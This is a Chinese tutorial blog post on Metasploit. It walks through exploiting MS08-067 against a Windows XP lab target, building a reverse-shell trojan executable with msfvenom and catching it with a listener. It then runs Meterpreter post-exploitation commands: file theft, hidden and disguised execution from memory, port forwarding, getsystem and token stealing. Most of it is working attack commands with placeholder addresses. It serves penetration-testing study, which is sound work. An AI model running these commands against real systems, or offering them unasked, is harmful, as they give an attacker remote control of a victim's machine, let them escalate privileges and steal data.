zoukankan      html  css  js  c++  java
  • (msf使用)msfconsole

    ⭐【msf】 msfconsole meterpreter


    对于这款强大渗透测试框架,详情介绍可看这里:metasploit 使用教程


    对于msfconsole, Kali Linux 自带。只需用命令行启动便可。


    ⭐msfconsole 启动不了/初次使用


    service postgresql start     # 启动数据库服务
    msfdb init             # 初始化数据库
    msfconsole             # 启动metasploit
    

    【注】msfconsole 不会就用 msfconsole -h msf5 > help 查看帮助


    ⭐ms08-067漏洞攻击实践


    ifconfig 命令 可 查看kail 系统ip ipconfig 查看 Windows ip

    kali: 192.168.xxx.xxx (攻击靶机)


    windows xp xxx : 192.168.xxx.xxx (被攻击靶机)


    msfconsole - 进入


    msfconsole
    


    红框中 标记的是:Metasploit所有的利用模块、payload、post模块等等模块


    search - 查看漏洞


    search ms08_067
    


    use - 使用漏洞


    use exploit/windows/smb/ms08_067_netapi
    

    show - 查看可以攻击的靶机操作系统型号(targets)


    show targets
    

    set - 设置target 参数


    xx是对应被攻击靶机的型号


    set target xx
    

    set - 设置rhost参数


    此ip为被攻击靶机的ip地址


    set rhost 192.168.xxx.xxx
    

    show - 查看参数


    show options
    


    exploit - 进行攻击


    exploit
    


    session 查看目前服务器端会话

    sessions -i
    


    启动x会话 。

    sessions -i x
    


    之后用 meterpreter 命令,转 shell 命令

    shell
    

    back - 实现返回


    back
    


    查看 payload

    show payloads
    

    ⭐利用msfvenom生成木马攻击靶场


    【参考链接】: i春秋 Meterpreter综合提权


    msfvenom 生成 .exe 文件


    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=yyyy -f exe -o /tmp/muma.exe
    
    windows/meterpreter/reverse_tcp : payload
    lhost :木马反弹到的监听端地址=192.168.xxx.xxx
    lport :监听端口=yyyy
    

    常见 msfvenom 命令参数如下:


    -p 选择一个载荷(payload)


    -l 载荷列表


    -f 生成的文件格式


    -e 编码方式


    -i 编码次数


    -b 在生成的程序中避免出现的值


    -h 帮助


    用msfconsole监听


    选用 exploit/multi/handler 监听模块


    use exploit/multi/handler
    

    设置payload:


    set payload windows/x64/meterpreter/reverse_tcp
    

    设置 监听ip地址以及监听端口:


    set lhost 192.168.xxx.xxx
    
    set lport yyyy
    

    查看设置参数:


    show options
    

    开启配置模块进行监听


    exploit
    



    ⭐Meterpreter


    Meterpreter命令详解


    常见命令


    upload - 上传文件


    上传1.txt到目标靶机c:muma下


    upload 1.txt c:\muma\
    


    download - 下载目标靶机相对应权限的任意路径下的文件


    命令 download file path


    download c:\muma\1.txt
    

    sysinfo 命令:


    显示远程主机的系统信息,显示计算机、系统信息、结构、语言等信息。


    运行目标主机上的cmd.exe程序,以隐藏的方式直接交互到meterpreter会话上


    execute  -H -i -f cmd.exe
    

    execute  -H -m -d notepad.exe-f  muma.exe -a "-o muma.txt"
    
    -d 在目标主机执行时显示的进程名称(用以伪装)
    
    -m 直接从内存中执行
    
    "-o muma.txt"是muma.exe的运行参数
    

    网络命令


    portfwd 命令:


    portfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx # 端口转发,本机监听yyyy,把目标机zzzz转到本机yyyy
    
    netstat -an | grep"yyyy" #查看指定端口开放情况
    

    基础提权


    getsystem
    


    利用 ps 命令查看目标靶机当前进程


    找到管理员相应PID。若PID:xxxx


    steal_token xxxx
    #盗取guanliyuan
    getuid
    #检查是否成功
    shell
    

    【侵权删】


    【转载请放链接】 https://www.cnblogs.com/Jlay/p/msf.html

  • 相关阅读:
    POJ 3126 Prime Path
    POJ 2429 GCD & LCM Inverse
    POJ 2395 Out of Hay
    【Codeforces 105D】 Bag of mice
    【POJ 3071】 Football
    【POJ 2096】 Collecting Bugs
    【CQOI 2009】 余数之和
    【Codeforces 258E】 Devu and Flowers
    【SDOI 2010】 古代猪文
    【BZOJ 2982】 combination
  • 原文地址:https://www.cnblogs.com/Jlay/p/msf.html
Copyright © 2011-2022 走看看